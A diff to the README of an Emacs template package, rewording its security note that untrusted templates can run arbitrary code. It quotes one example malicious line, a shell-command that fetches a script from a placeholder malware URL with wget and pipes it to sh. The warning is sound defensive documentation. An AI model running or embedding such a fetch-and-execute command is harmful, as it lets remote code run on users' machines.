nbfalcon/ptemplate/README.md

 # Security note
-Due to the smart expansion feature, and due to allowing yasnippets in templates, ptemplate is *not* secure.
+Due to the smart expansion feature, and due to allowing yasnippets in templates, ptemplate is *not* secure the same way as a modern browser is, for example.
 You should use only trusted templates.
-A malicious template could have a snippet like the following in its .ptemplate.el or in a
+A malicious template could have a snippet like the following in its .ptemplate.el or in a \`\` block of one of its
-\`\` block of one of its yasnippets:
+yasnippets:

 ```emacs-lisp
 (shell-command "wget $SH_MALWARE_URL | sh")